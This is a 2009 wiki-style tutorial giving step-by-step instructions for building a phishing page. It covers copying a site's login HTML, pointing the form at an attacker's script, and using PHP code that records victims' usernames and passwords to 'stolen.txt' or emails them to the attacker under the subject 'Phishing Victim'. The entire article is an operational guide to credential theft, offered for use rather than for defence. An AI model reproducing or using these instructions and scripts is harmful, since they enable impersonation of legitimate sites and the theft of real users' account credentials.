Create a phishing page


How To Make A Phishing Page

This article shows you 1 method attackers use to make phishing pages using php.

part 1: HTML

To start with, navigate to the page you want to create a page for. Now right click on the page and select "view source." This bring up the html source code of the page. You need the page to be able to work fine outside of the site. This part can become long and frustrating, but shouldn't be too hard.

$lt;a href='src/login.php'$gt;

is a shortened URL. All these forms of links need to be changed to the full url. This is also the same for everything on the page, e.g. images, JavaScript, flash files .. etc if you notice that they all could be fixed using the same format, you can use HTML "base href" e.g. for

$lt;base href=""/$gt;

put this at the top of the page, and click file --$gt; save as and save it as index.html and run it. If everything on the page works, your done. Otherwise change them all manually.

$lt;form action="login.php" method="post"$gt;
  • $lt;input type="text" id="username" name="username"/$gt;
  • $lt;input type="password" id="password" name="password"/$gt;
  • $lt;input type="submit" name="Login" value="Login"$gt;

    You need to focus on the parts in red. The first needs to be changed to the full location of your php script on the last 3 need to be written down to add to the script. Try opening the page. It should now look just like the actual login page.

    PHP Script

    Finally, the script. There are 2 methods of sending the login information:

    • Store in a text file
      • Send via email

    Text File

    Here is the full code of the page that saves the logins to a textfile:

    if ($_POST['submit']){

    $myFile = "stolen.txt";
    $fh = fopen($myFile, 'a') or die("can't open file");
    $stringData = "username: " . $_POST['username'] . "\n";
    fwrite($fh, $stringData);
    $stringData = "password: " . $_POST['password'] . "\n";
    fwrite($fh, $stringData);

    } ?$gt;


    All the parts in red must be changed,

    • The name of the submit button (final on form)
      • The names of username/password text boxes on the form
        • the final link to the real page once the details are stolen.


    For this, you will need a decent host with php sendmail enabled. To test if it is on, you could try sending an email using the example listed here Here is the script (refer to the above example for what parts need to be changed:


    if ($_POST['submit']) {

    $message = "username: " . $_POST['username'] . "\n";
    $message .= "password: " . $_POST['password'] . "\n";
    $to = "";

    mail($to, 'Phishing Victim', $message);


    This again needs parts changed in order to work. This is also safer as only you can see the details, so theres no chance of anyone guessing the text file name. That should hopefully be enough to understand how to create these, finally the article below tells you more about phishing and attack methods using the phishing page.


  • Edit this articleEdit this article

    Last modified by: t0mmy9 (February 2, 2009, 6:19 pm)
    Previously modified by: t0mmy9 (February 2, 2009, 6:19 pm), t0mmy9 (February 2, 2009, 6:11 pm), t0mmy9 (February 2, 2009, 6:07 pm), t0mmy9 (February 2, 2009, 6:01 pm), t0mmy9 (February 2, 2009, 6:00 pm), t0mmy9 (February 2, 2009, 5:55 pm)